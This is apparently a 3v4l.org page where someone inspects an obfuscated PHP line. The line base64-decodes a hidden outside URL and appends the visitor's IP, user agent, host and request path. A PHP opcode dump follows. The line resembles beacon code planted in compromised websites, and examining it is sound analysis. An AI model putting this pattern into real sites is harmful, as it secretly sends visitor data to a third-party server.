3v4l.org

run code in 300+ PHP versions simultaneously
<?php echo base64_decode( 'aHR0cDovL21icm93c2Vyc3RhdHMuY29tL3N0YXRIL3N0YXQucGhw').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
Finding entry points
Branch analysis from position: 0
1 jumps found. (Code = 62) Position 1 = -2
filename:       /in/AsOcd
function name:  (null)
number of ops:  35
compiled vars:  !0 = $sUserAgent
line      #* E I O op                           fetch          ext  return  operands
-------------------------------------------------------------------------------------
    2     0  E >   INIT_FCALL                                               'base64_decode'
          1        SEND_VAL                                                 'aHR0cDovL21icm93c2Vyc3RhdHMuY29tL3N0YXRIL3N0YXQucGhw'
          2        DO_ICALL                                         $1      
          3        CONCAT                                           ~2      $1, '%3Fip%3D'
          4        INIT_FCALL                                               'urlencode'
          5        FETCH_R                      global              ~3      '_SERVER'
          6        FETCH_DIM_R                                      ~4      ~3, 'REMOTE_ADDR'
          7        SEND_VAL                                                 ~4
          8        DO_ICALL                                         $5      
          9        CONCAT                                           ~6      ~2, $5
         10        CONCAT                                           ~7      ~6, '%26useragent%3D'
         11        INIT_FCALL                                               'urlencode'
         12        SEND_VAR                                                 !0
         13        DO_ICALL                                         $8      
         14        CONCAT                                           ~9      ~7, $8
         15        CONCAT                                           ~10     ~9, '%26domainname%3D'
         16        INIT_FCALL                                               'urlencode'
         17        FETCH_R                      global              ~11     '_SERVER'
         18        FETCH_DIM_R                                      ~12     ~11, 'HTTP_HOST'
         19        SEND_VAL                                                 ~12
         20        DO_ICALL                                         $13     
         21        CONCAT                                           ~14     ~10, $13
         22        CONCAT                                           ~15     ~14, '%26fullpath%3D'
         23        INIT_FCALL                                               'urlencode'
         24        FETCH_R                      global              ~16     '_SERVER'
         25        FETCH_DIM_R                                      ~17     ~16, 'REQUEST_URI'
         26        SEND_VAL                                                 ~17
         27        DO_ICALL                                         $18     
         28        CONCAT                                           ~19     ~15, $18
         29        CONCAT                                           ~20     ~19, '%26check%3D'
         30        FETCH_IS                                         ~21     '_GET'
         31        ISSET_ISEMPTY_DIM_OBJ                         0  ~22     ~21, 'look'
         32        CONCAT                                           ~23     ~20, ~22
         33        ECHO                                                     ~23
         34      > RETURN                                                   1

Generated using Vulcan Logic Dumper, using php 8.0.0


preferences:
148.96 ms | 1396 KiB | 17 Q